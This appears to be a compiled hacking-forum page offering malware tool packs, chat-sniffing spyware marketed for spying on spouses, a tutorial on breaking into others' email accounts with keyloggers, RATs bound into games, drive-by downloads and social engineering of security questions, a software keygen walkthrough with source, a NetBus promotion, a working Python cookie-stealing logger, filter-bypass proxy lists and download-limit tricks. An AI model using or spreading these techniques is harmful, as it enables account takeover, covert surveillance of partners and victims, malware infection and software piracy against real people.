Hacking

Hacking

Hacking is wonderful practise only when you keep on safe side...


Quote: This AIO is with viruses cos these are hacking tools and AV detect as viruses! I think it's better to use deep freeze and than u can freeze ur pc when u use this tools and than u can unfreeze it when u don't use ! Quote: Contents: AddrView AnonFTP AOL new AppToService arpinject aspack21 Astaroth Joiner v2 atk-2.1 BankOfAmerica bios_pass_remover BlasterW32 blue bmpripper brutus Cable Modem Sniffer CapKeys_DIGITAL CASXM138 CAYZODQF CGI Founder v1.043 cgis4 CGISscan cia10 cports craagle Crackftp CreditCardGjenerator Davs_TR_REtail DDL Sites DeepUnFreez DrVBS eBay EESBinder egold E-mail Cracker ezDataBase_Defacer F.B.I - Binder FTP Brute Forcer ftpbr ~Censored~ Mail Bomber 2.3 G00B3RS_phpBB_exploit_pack genxe-beta-0.9.0 Google_Hacker_1.2 grinder1.1 Hack FLASH Template Hack MY Space Hack Photoshop CS2 HackersAssistant HackTheGame hck hlboom Hook Tool Box Hotmail Email Hacker Hotmail HAcker Gold Hotmail ScamPage HotmailHack HSBC-US hydra-4.6-win iecv IP2 ipnetinfo john-17w Key Changer Key_Logger Legion NetBios Scanner v2.1 Mail Boomb_2.0 YAHOO MIDNITEmassacre MooreR Port Scanner MSN Flooder 2.0 MSN Messenger Account Cracker v2.0 MSNLoader NET BIOS Scaner NetBIOS Name Scanner NetResView NFO Maker 1.0 Nimda nkedb nolimitcracker NTPacker nts NullAddFrontend On-Off MSN OS Update Hack P0kes WormGen 2.0 panther PayPal PCAnyPass Php Nuke Hacker v11.0 phpBB Annihilator phpbb attack phpbb bruteforcer PhpBB pass extractor phpBB_DoS phpbb_spammer phpBBAttacker phpBBAttacker phpBBcracker PhpBuGScan PHP********er PhpNuke_bypass Ping & Nukes Port Listener XP pqwak2 procexp ProMo ProxyPro Pure phpBB Email harvester rainbowcrack-1.2-src win-lin Remote Shut Down ResHacker Rocket rpc RpcScan101 Sasser SendMailer Server 2003 Keygen Server Killer showpassv10 sitedigger2 smbat-win32bin-1.0.4 SMBdie smbproxy-win32bin-1.0.0 Source Checker source codes sprut SQLScan v1.0 Stealth - HTTP Scanner v1.0 build 23 super SuperScan4 tftpd32.273 thunter TinaSoft KILL traceroute UC.Forum Spam udpflood Ultra Dos USBank Visa Spam Warez Sites Web Cracker 2.0 WebCracker 4.0 whoistd Win XP Activator WindowHide Windows XP Corperate Keygen Windows XP KeyGen Windows XP Product Key Changer Windows XP Product Key Checker Windows XP Product Key Viewer WindowsAdminpasswordHack wwwhack xpass xplizer Yahoo Password yahooUltraCracker zehir DOWNLOAD

http://rapidshare.com/files/79477953/UltraHackersWasp.rar


Yahoo Messenger Monitor Sniffer 3.0



Yahoo Messenger Monitor Sniffer is handy network utility software designed to capture and observe Yahoo Messenger conversations on all computers in a network. It is able to record conversations automatically in real time. And export all intercepted messages to HTML files for later processing and analyzing. It is very easy to make it to work, and it will monitor all conversations in your Local Area network without the use of client software installed on the remote computer.
Key Featurer of Yahoo Messenger Monitor Sniffer
  • Capture and sniff Yahoo Messenger conversations from remote computer on the network.
  • Record or Yahoo Messenger chat conversations (include chat room).
  • Export all intercepted messages to HTML files.
  • Automatically send the chat logs to your e-mail for remote viewing.
  • Password and hot key protection.
  • Run in stealth mode.
  • Start capturing on the program startup.
  • User safe, easy, and powerful.
Ankit Parikh
Who use it?
Company Managers Supervise your employees' chatting at work, and record the time and conversation details for later reference.
Parents Want to know what your children are most concerned?
Couples Monitor whom your spouse is chat with and what they are talking about.
Minimal system configuration:
  • Operating System: Windows XP, 2000,2003 or Windows NT
  • Network Adapter: Network card.
  • 64 MB of RAM available
Link:
MSN Messenger Monitor Sniffer 3.5
MSN Messenger Monitor Sniffer is network utility software designed to monitor, record and capture MSN Messenger conversations on all computers in a network. It is able to record all conversations automatically and export all intercepted messages to HTML files for later processing and analyzing. It is very easy to make it to work, and it will monitor all conversations in your local area network without the use of client software installed on the remote computer.
Key Features of MSN Messenger Monitor Sniffer
Capture and sniff MSN Messenger conversations from remote computer on the network. Record or MSN Messenger chat conversations. Export all intercepted messages to HTML files. Automatically send the chat logs to your e-mail for remote viewing. Password and hot key protection. Run in stealth mode. Start capturing on the program startup. User safe, easy, and powerful.
Ankit Parikh
Who use it?
Company Managers Supervise your employees' chatting at work, and record the time and conversation details for later reference.
Parents Want to know what your children are most concerned?
Couples Monitor whom your spouse is chat with and what they are talking about.
Minimal system configuration:
Operating System: Windows XP, 2000,2003 or Windows NT Network Adapter: Network card. 64 MB of RAM available
Links:

Disclaimer : I do not endorse Hacking ! This is meant for educational purpose only ! I want u to know how others can try break into your Personal life ! Beware !!

This is a Genuine Article.

Will try to add in as much as possible keep posting ! comment on this article !

Introduction





I have written this tutorial to address a question that is all too commonly asked in any channel/chat room with "hack" in the title (asked in frequency to the point of harrassment really). So since this is a question that so many people ask, then I believe that there should at least be an answer available (regardless of the morality or "lameness" of such a question). So you as the reader are most likely reading this because you want to break into somebody's email account. Well, you must understand that there is no 1-2-3 process to anything. I will give you options to consider when persuing such a task, but it will ultimately be up to you to do this. This is what you want to do, and no matter what sort of offers you throw up at anybody, nobody is going to do this for you. There is no program that is going to do all this for you. Also don't forget that nobody is going to hold your hand and lead you through this. I'm offering you as the reader suggestions for ways you can address this task, and that is about all the help you are going to get from anybody. So now that I've made all that clear, let's begin...

Things You Should Know

As I mentioned in the previous section, there is no program that will do all this for you. Almost all the crackers you see out there will not work, because services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts. There are some rare exceptions, like some crackers for Yahoo! that are made for cracking "illegal" accounts, but the thing you must understand about those types of crackers is that they are built to crack SPECIFICALLY "illegal" names. They can not be used to target a specific account on Yahoo!, so don't try to use them for this purpose. Another thing you must know if you ask this question in any "hacker" chat room/channel (which I highly discourage), or if you read something on this topic, and you hear that you have to email some address and in any way have to give up your password in the process, do NOT believe this. This is a con used to trick gullible people into handing over their passwords. So don't fall for this. Well that concludes this section, now lets get to what you want to know.




If You Have Physical Access

I will start off with options you have if you have physical access to the computer of the user that you are targeting, because it is a lot easier if you do. One option you have, that you will hear a lot if you ask this question, and anybody bothers to answer is to use a keylogger. A keylogger is an excellent option, and probably the easiest. There are a lot of keyloggers out there, ranging from hardware keyloggers, to software keyloggers. For this task, you won't need to buy a hardware keylogger, since the only advantage to a hardware one is that you can grab passwords that are given to access a certain local user on the operating system used. There are a lot of software keyloggers out there, and you can feel free to check out www.google.com to look at your options. I will go ahead and toss a couple of keyloggers out to try for those of you who seem allergic to search engines. One option you have that is good for a free keylogger is Perfect Keylogger (which you can find at www.blazingtools.com/bpk.html). It works just fine, and has some nice options to keep it hidden from your average end user (computer user). Another option you have, which is probably the best one you can get is Ghost Keylogger. It has a lot of options that will allow you to get the results of this program remotely (it will email you the results). However, this is not a free keylogger, so if you are wanting to get a copy you can look on the file sharing networks for a copy of the program, and the serial number for it (look on www.zeropaid.com for different file sharing clients you can try). Once you have whatever keylogger you are going to use downloaded, just install it onto the computer you are wanting to monitor, and wait till next time they login to their email account. You will then have the password for the account. Another option you have if they use Outlook to access their email account, is to copy the *.dbx files for their Outlook account onto a floppy, and extract the emails at home (the dbx file stores the files stored in each Outlook folder on a given account, meaning the received and sent emails). When you are on the computer of the user you are targeting, look in C:\Windows\ApplicationData\Identities\{ACblahblahblah}\Microsoft\ OutlookExpress\ and copy all the .dbx files onto a floppy. Then when you take the .dbx files back to your house, use DBXtract to extract the messages from these files. Check out the link below to download this program....

www.download-freeware-shareware.com/Freeware-Internet.php?Type=4171

Another option you have if you have physical access is to execute a RAT (Remote Administration Tool, you may know these programs as trojans) server on the computer. Of course, you do not have to have physical access to go this route, but it helps. What you must understand is that these tools are known threats, and the popular ones are quickly detected by antivirus software, and thusly taken care of. Even ISPs block incoming/outgoing traffic from the most popular ports used by these programs. One newcomer in the RAT market that you should know about is Project Leviathan. This program uses already existing services to host it's service, instead of opening up an entirely new port. This allows it to hide itself from any port detection tool/software firewall that may be in place. This of course will not guarantee that it's server program will not be detected by any antivirus software used (actually, if the user has kept up with his/her signature tables, then it WILL be detected), but it will give you more of a chance of holding access. Search the engines to download Project Leviathan... Once you have downloaded this tool, follow the instructions listed to install and use this program. However, since this RAT is a command line tool, you will still need another program set up on the user's computer in order to catch the desired password. For this, you can use Password Logger.. Google it Once you have this downloaded, set it up on the targeted computer. The program will remain hidden, while logging any types of passwords into a .lst file in the same directory that you executed it on. Therefore, you can access this *.lst file through Project Leviathan remotely in order to retrieve the user's email password remotely. Well that pretty much concludes it for this section. At this very moment I can practically hear a lot of you thinking to yourselves "But, but I don't HAVE physical access!". No reason to worry, that's what the next section is for...

If You Don't Have Physical Access

Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT. To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)... On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior). If you don't like any of those, I'm afraid you are going to have to go to www.google.com, and look for some yourself. Search for something like "optix pro download", or any specific trojan. If you look long enough, among all the virus notification/help pages, you should come across a site with a list of RATs for you to use (you are going to eventually have to learn how to navigate a search engine, you can't depend on handouts forever). Now back to the topic at hand, you will want to send this file to the specified user through an instant messaging service. The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614. So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account. Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into. Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer... While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page... http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=539&lngWId=8 Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks. Well, then you definately have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account. If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need. First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers). Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. Good luck...







-===========================- Introduction ------------ I take no responsibility of the usage of this information. This tutorial, is for educational knowledge ONLY. Hi there, in this tutorial, I intend to teach you how to make a pretty simple keygen, of a program called W3Filer 32 V1.1.3. W3Filer is a pretty good web downloader... I guess some of you might know the program. I`ll assume you know: A.How to use debugger (in this case, SoftIce). B.How to crack, generally (finding protection routines,patching them,etc...). C.How to use Disassembler (This knowledge can help). D.Assembly. E.How to code in Turbo Pascal (tm). Tools you`ll need: A.SoftIce 3.00/01 or newer. B.WD32Asm. (Not a must). C.The program W3Filer V1.13 (if not provided in this package), can be found in www.windows95.com I believe. D.Turbo Pascal (ANY version). Well, enough blah blah, let's go cracking... Run W3Filer 32. A nag screen pops, and , demands registration (Hmm, this sux ;-)) Now, We notice this program has some kind of serial number (Mine is 873977046), Let's keep the serial in mind, I bet we`ll meet it again while we're on the debugger. Well, now, let's put your name and a dummy reg code... set a BP on GetDlgItemTextA, and, press OK. We pop inside GetDlgItemTextA, Lets find the registration routine... I`ll save you the work, the registration routine is this: :00404DB2 8D95A8FAFFFF lea edx, dword ptr [ebp+FFFFFAA8] :00404DB8 52 push edx ---> Your user name here. :00404DB9 E80B550000 call 0040A2C9 ---> Registration routine. :00404DBE 83C408 add esp, 00000008 ---> Dunno exactly what is it. :00404DC1 85C0 test eax, eax ---> Boolean identifier, 0 if :00404DC3 7D17 jge 00404DDC ---> registration failed, 1 if OK. Well, Let's enter the CALL 40A2C9, and see what's inside it: (Please read my comments in the code). * Referenced by a CALL at Addresses: |:00404DB9 , :00407F76 | :0040A2C9 55 push ebp :0040A2CA 8BEC mov ebp, esp :0040A2CC 81C4B0FEFFFF add esp, FFFFFEB0 :0040A2D2 53 push ebx :0040A2D3 56 push esi :0040A2D4 57 push edi :0040A2D5 8B5508 mov edx, dword ptr [ebp+08] :0040A2D8 8DB500FFFFFF lea esi, dword ptr [ebp+FFFFFF00] :0040A2DE 33C0 xor eax, eax :0040A2E0 EB16 jmp 0040A2F8 * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:0040A2FB(C) | :0040A2E2 0FBE0A movsx ecx, byte ptr [edx] ----> Here Starts the interesting part. :0040A2E5 83F920 cmp ecx, 00000020 ----> ECX is the the current char in the user name, Hmm, 20h=' '... :0040A2E8 740D je 0040A2F7 ----> Let's see, :0040A2EA 8A0A mov cl, byte ptr [edx] ----> Generally, all this loop does, is copying the user name from [EDX], to [ESI], WITHOUT the spaces! (Keep this in mind! ). :0040A2EC 880C06 mov byte ptr [esi+eax], cl :0040A2EF 42 inc edx :0040A2F0 40 inc eax :0040A2F1 C6040600 mov byte ptr [esi+eax], 00 :0040A2F5 EB01 jmp 0040A2F8 * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:0040A2E8(C) | :0040A2F7 42 inc edx * Referenced by a (U)nconditional or (C)onditional Jump at Addresses: |:0040A2E0(U), :0040A2F5(U) | :0040A2F8 803A00 cmp byte ptr [edx], 00 :0040A2FB 75E5 jne 0040A2E2 ----------------> This is the loop , we got what it does, Let's continue tracing the code... :0040A2FD 56 push esi --------> The user name is pushed, in order to Upcase it's chars. * Reference To: USER32.CharUpperA, Ord:0000h | :0040A2FE E80F330000 Call User!CharUpper ---> After this, our name is in upper case. :0040A303 56 push esi -----> Our name in upper case here. * Reference To: cw3220mt._strlen, Ord:0000h | :0040A304 E86F300000 Call 0040D378 ---> This is the length of our name. :0040A309 59 pop ecx :0040A30A 8BC8 mov ecx, eax ---> ECX=Length. :0040A30C 83F904 cmp ecx, 00000004 ---> Length>=4 (MUST). :0040A30F 7D05 jge 0040A316 ---> Let's go to this address... :0040A311 83C8FF or eax, FFFFFFFF :0040A314 EB67 jmp 0040A37D * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:0040A30F(C) | :0040A316 33D2 xor edx, edx :0040A318 33C0 xor eax, eax :0040A31A 3BC8 cmp ecx, eax :0040A31C 7E17 jle 0040A335 ---> (Not important, just another useless checking). =================================================================================== ============ FROM HERE AND ON, THE IMPORTANT CODE, PAY ATTENTION ================== =================================================================================== One thing before we continue, EDX = 00000000h as we enter to the next instructions. * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:0040A333(C) | :0040A31E 0FBE1C06 movsx ebx, byte ptr [esi+eax] ---> EBX <--- char in user name, offset EAX. :0040A322 C1E303 shl ebx, 03 -----> Hmm, it shl's the char by 03h... (Remember that). :0040A325 0FBE3C06 movsx edi, byte ptr [esi+eax] ---> Now EDI <--- Char in user name , offset EAX. :0040A329 0FAFF8 imul edi, eax -----> It multiplies the char by the offset in user name! (Remember that). :0040A32C 03DF add ebx, edi -----> Adds the result to EBX (That was Shelled (Ding Dong =)). :0040A32E 03D3 add edx, ebx -----> EDX=EDX+EBX!!! - This is the CORE of this registration routine!!! :0040A330 40 inc eax -----> Increase EAX by one (next char). :0040A331 3BC8 cmp ecx, eax :0040A333 7FE9 jg 0040A31E ----> If ECX loop. * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:0040A31C(C) | :0040A335 A120674100 mov eax, dword ptr [00416720] ---> HMMMMMM, What's in here????? :0040A33A C1F803 sar eax, 03 ---------> WAIT! Please type in SIce '? EAX' Does this number in EAX look familiar to us? ;-) If you still don`t understand, than, It's our SERIAL NUMBER! (PLEASE, take your time, and check by yourself - don`t trust me!). OK, so now we know, That it SHR's EAX by 03 (SAR is almost identical to SHR). :0040A33D 03D0 add edx, eax ---------> Hmm, it adds the result from the loop, the serial number shr'd by 03h :0040A33F 52 push edx -------> Let's continue. (At this point, I can tell you , the reg number, is in EDX - only that the reg number is in HEX --> That's how you enter it). * Possible StringData Ref from Data Obj ->"%lx" | :0040A340 685EF54000 push 0040F55E :0040A345 8D95B0FEFFFF lea edx, dword ptr [ebp+FFFFFEB0] :0040A34B 52 push edx * Reference To: USER32.wsprintfA, Ord:0000h | :0040A34C E8E5320000 Call 0040D636 -------> This one, does HEX2STR (Takes the value from EDX, and turns it to an hex string). :0040A351 83C40C add esp, 0000000C :0040A354 8D8DB0FEFFFF lea ecx, dword ptr [ebp+FFFFFEB0] -----> type 'd ecx' - THIS is the reg number! That's enough for us, the rest of the code, is just for comparing the correct reg code with ours. :0040A35A 51 push ecx * Reference To: USER32.CharLowerA, Ord:0000h | :0040A35B E8B8320000 Call 0040D618 :0040A360 8D85B0FEFFFF lea eax, dword ptr [ebp+FFFFFEB0] :0040A366 50 push eax :0040A367 FF750C push [ebp+0C] * Reference To: cw3220mt._strcmp, Ord:0000h | :0040A36A E875300000 Call 0040D3E4 :0040A36F 83C408 add esp, 00000008 :0040A372 85C0 test eax, eax :0040A374 7405 je 0040A37B :0040A376 83C8FF or eax, FFFFFFFF :0040A379 EB02 jmp 0040A37D * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:0040A374(C) | :0040A37B 33C0 xor eax, eax * Referenced by a (U)nconditional or (C)onditional Jump at Addresses: |:0040A314(U), :0040A379(U) | :0040A37D 5F pop edi :0040A37E 5E pop esi :0040A37F 5B pop ebx :0040A380 8BE5 mov esp, ebp :0040A382 5D pop ebp :0040A383 C3 ret Making the actual Keygen ~~~~~~~~~~~~~~~~~~~~~~~~ Now, after I've explained how does the program calculate the registration code, you can either write your own keymaker, without looking at my code, or look at my code (in Turbo Pascal - sorry for all you C lovers ;-) Next time). That's it, here's the source of my keygen: ------------------- Cut here --------------------------------------------- Program W3FilerKeygen; var Key,SerialNum,EB,ED,digit:Longint; I,x:Byte; Name,KeyHex:String; begin Writeln(' W3Filer32 V1.1.3 Keymaker'); writeln('Cracked by ^pain^ ''97 / Rebels!'); Write('Your Name:'); { Read the name } readln(Name); Write('Serial Number:'); readln(SerialNum); {Yes, we need the serial number for the calculation!} Key:=0; x:=0; For I:=1 to length(Name) do begin Name[I]:=upcase(Name[i]); If Name[I]<>' ' then begin eb:=ord(Name[I]) shl 3; {EB = Name[I] Shl 03h} Ed:=ord(Name[I]); {ED = Name[I]} ed:=ed*(x); {ED=ED*Offset} inc(x); eb:=eb+ed; {Add ED to EB} Key:=Key+EB; {Add EB to KEY} end; end; Key:=Key+(SerialNum shr 3); { Add SerialNum shr 03h to Key} { From here, this is just HEX2STRING --> I`m quite sure it's Self explaintory, else - go and learn number bases again! ;-)} KeyHex:=''; repeat digit:=Key mod 16; key:=key div 16; If digit<10>10 then KeyHex:=Chr(Digit-10+ord('a'))+KeyHex; until key=0; writeln('Your Key:',KeyHex); writeln(' Enjoy!'); end.


First watch youtube demo video and download the software..!!






NetBus is a software program for remotely controlling a Microsoft Windows computer system over a network. WHAT CAN U DO TO SOME ONE COMPUTER USING NETBUS? 1. Open/close the CD-ROM tray once or in intervals (specified in seconds); 2. Show optional BMP or JPG image (full path allowed); 3. Swap mouse buttons - the right button gets the left button's functions and vice versa; 4. Start optional application (full path allowed); 5. Play optional WAV sound-file (full path allowed); 6. Point the mouse to optional coordinates; 7. Show a message dialog on the screen and allow the user on remote system to answer it; 8. Shutdown Windows, reboot, logoff or power off; 9. Go to an optional URL within the default web-browser; 10. Send keystrokes to the active application on the target computer; 11. Listen for keystrokes on remote system and save them to file; 12. Get a screenshot from remote computer; 13. Return information about the target computer; 14. Upload any file to the target computer or update the server part of NetBus; 15. Increase and decrease the sound-volume; 16. Record sounds that the microphone catch - to listen what happens in the room where remote computer is; 17. Make click sounds every time a key is pressed; 18. Download and deletion of any file from the target system; 19. Blocking certain keys on the remote system keyboard; 20. Password-protection management of the remote server; 21. Show, kill and focus windows on remote system. first watch youtube demo video and download the software..!! How to hack ur friends computer with netbus youtube demo video:-
Code:
http://youtube.com/watch?v=HHpyGQE0GBc
Download netbus 1.7:-
Code:
http://www.uploadjockey.com/download/7921638/netbus170.zip

#!/usr/bin/python

import os
import sys
import cgi
import datetime

if __name__ == "__main__":

log=[]
log.append(str(datetime.datetime.today()))

# get the cookie from url?c=asdf
form = cgi.FieldStorage()
if form.has_key("c"):
log.append(form["c"].value)
else:
log.append()

# get some request info
log.append(str(os.environ['REMOTE_ADDR']))
log.append(str(os.environ['HTTP_REFERER']))
log.append(str(os.environ['HTTP_USER_AGENT']))

# save the log array
f = os.open("cookielog.txt",os.O_APPEND|os.O_WRONLY)
os.write(f,",".join(log)+"\r\n")
os.close(f)

# write response
sys.stdout.write("Content-Type: image/gif\r\n\r\n")
pixel = os.open("../images/pixel.gif",os.O_RDONLY)
sys.stdout.write(os.read(pixel,1000))
os.close(pixel)
sys.stdout.flush()

http://www.proxy.iandron.cn
http://www.proxin.cn
http://www.yogdham.com
http://www.fmshiva.com
http://www.server72.uck.in
http://www.xef.in
http://www.a81.info
http://www.server5.xoy.in
http://www.my.surfopolis.info
http://www.the.peepntom.info
http://www.myspace.proxopolis.info
http://www.bypass2bebo.info
http://www.server32.uck.in
http://www.Pingo.us.to
http://www.obama5.info
http://www.neatproxy.com
http://www.bypassinternetfilters.com
http://www.beatfiltering.com
http://www.planetx5.com
http://www.myspaceproxe.info
http://www.proxify.com
http://www.unblockall.net
http://www.proxydoo.com
http://www.strongcover.info
http://www.sureproxy.com
http://www.btunnel.com
http://www.fastwebproxy.net
http://www.secretsurf.us
http://www.adminproof.com
http://www.unlockm8.com
http://www.vtunnel.com
http://www.polysolve.com
http://www.virtual-browser.com
http://www.spacesneaker.com
http://www.proxability.com
http://www.zorg-proxy.com
http://www.hidetopia.com
http://www.movieoid.com
http://www.rule-breakers.info
http://www.anonymize.ws
http://www.getbynow.com
http://www.hushsurf.info
http://www.proxygp.com
http://www.hidden4u.com
http://www.turtleterror.com
http://www.acrs.info
http://www.yourproxy.eu
http://www.moolia.com
http://www.proxicate.net
http://www.hiddenhouse.org
http://www.unlockbrowse.info
http://www.xamal.org
http://www.gamerzgalore.com
http://www.bestonlineproxy.com
http://www.freedomtunnel.info
http://www.p-r-0-x-y.com
http://www.topprocksy.com
http://www.briskpass.com
http://www.gyub.com
http://www.clanzhost.com
http://www.proxiefun.com
http://www.stealthm8.com
http://www.freedombrowse.info
http://www.unblockathon.org
http://www.proxiee.info
http://www.myspaceaddict.info
http://www.blind-ip.com
http://www.proxyvent.com
http://www.mytiger.info
http://www.socialsurf.us
http://www.waythru.info
http://www.ninjahide.com
http://www.tophosts.info
http://www.payday2007.com


Pearson Custom Publishing
*ISBN 0-536-90379-4

content






*Introduction to Hacking *Password Cracking *TCP/IP Vulnerabilities *Sniffers *Spoofing *Session Hijacking *Hacking Networking Components *Trojan Horses *Denial-of-Service Attacks *Reconnaissance Methods *Scanning Tools *Buffer Overflows *Programming Exploits *Mail Vulnerabilities *Web Application Vulnerabilities *Windows Vulnerabilities *Linux Vulnerabilities *Incident Handling http://rapidshare.com/files/118608848/Hacker_Techniques_and_Incident_Handling.rar

No More Wait for RapidShare and Megaupload
Step 1. Go to This Web

Code:
http://megadl.info/rs/
Step 2. In this website Click where it says
Rapidshare premium link generator Click here. Click on Click here.

Step 3. It will make you go to website.





Step 4. In this website Copy the link that you want to download from Rapidshare that you are waiting for.

Step 5. After you copy the link that you want to download from Rapidshare Past it in the space provide.

Step 6. Press Enter and you will be able to download it.

Follow this Same step in Magaupload.
But instead of click on Rapidshare Generator Click on Megaupload Generator. Copy the link and that you want to download and past it and press Enter. It should start download.

Enjoy n add reps if u like

PLEASE DOWNLOAD RS FILE AS A FREE USER :]

Here is how to use Megaupload during happy hour without having the toolbar installed

1. Download the FireFox extension "GreaseMonkey", and restart FireFox

2. Download this Javascript Script (as a free user please :])

Code:
Download:
http://rapidshare.com/files/70878826/megaupload.happyhour.js.rar
Inside this RAR archive is a javascript file and a file called, 1MB.rar, ignore that file and extract the javascript to somewhere convenient, i personally choose the desktop

Then open FireFox and go to File>Open and select the javascript file, the installed GreaseMonkey extension should recognize it and ask you if you want to add it to the list, select yes

Restart FireFox

3. Between the hours of 9PM and 3AM EST, go to
www.megaupload.com/premium/?happyhour

It will say that you have recieved premium access for the next 300 or so minutes.

Note: You may have to keep the Megaupload Happy Hour page open in a tab so that it remembers you have registered for Happy Hour



Web Hacking Attacks and Defense e-book | 6.32 MB



Exposes complete methodologies showing the actual techniques and
attacks. Shows countermeasures, tools, and eye-opening case studies.
Covers the web commerce playground, describing web languages and
protocols, web and database servers, and payment systems. Softcover.

Features include:

* Overview of the Web and what hackers go after

* Complete Web application security methodologies

* Detailed analysis of hack techniques

* Countermeasures

* What to do at development time to eliminate vulnerabilities

* New case studies and eye-opening attack scenarios

* Advanced Web hacking concepts, methodologies, and tools"How Do They Do It?"

sections show how and why different attacks succeed, including:

* Cyber graffiti and Web site defacements

* e-Shoplifting

* Database access and Web applications

* Java™ application servers; how to harden your Java™ Web Server

* Impersonation and session hijacking

* Buffer overflows, the most wicked of attacks

* Automated attack tools and worms

DOWNLOAD

http://www.mediafire.com/?2m3ql0vwjxa



Live Cd For Wireless Hacking, Also Used By The FBI

This version is for all systems except systems with the Intel B/G wireless cards (IPW2200).
- Live CD with all the tools you need to hack a WLAN / wireless Access point - Linux Live-CD - OS runs from CD - 635 mb - .iso
- also used by the FBI.

WEP Hacking - The Next Generation
WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products. WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver.

Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long. A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of �strong� encryption while a 128 bit key has 104. The IV is placed in encrypted frame�s header, and is transmitted in plain text.

Traditionally, crac*ing WEP keys has been a slow and boring process. An attacker would have to capture hundreds of thousands or millions of packetsa��a process that could take hours or even days, depending on the volume of traffic passing over the wireless network. After enough packets were captured, a WEP crac*ing program such as Aircrac* would be used to find the WEP key.

Fast-forward to last summer, when the first of the latest generation of WEP cracking tools appeared. This current generation uses a combination of statistical techniques focused on unique IVs captured and brute-force dictionary attacks to break 128 bit WEP keys in minutes instead of hours. As Special Agent Bickers noted, �It doesn�t matter if you use 128 bit WEP keys, you are vulnerable!�

WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products.
WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver.

Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long.
A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of �strong� encryption while a 128 bit key has 104.
The IV is placed in encrypted frame�s header, and is transmitted in plain text.
Traditionally, cracking WEP keys has been a slow and boring process.
An attacker would have to capture hundreds of thousands or millions of packets a process that could take hours or even days, depending on the volume of traffic passing over the wireless network.
After enough packets were captured, a WEP cracking program such as Aircrack would be used to find the WEP key.
Fast-forward to last summer, when the first of the latest generation of WEP cracking tools appeared.
This current generation uses a combination of statistical techniques focused on unique IVs captured and brute-force dictionary attacks to break 128 bit WEP keys in minutes instead of hours.

Basic Directions:
1)Boot from cd
2)get the wep key
3)write it down
4)reboot into windows
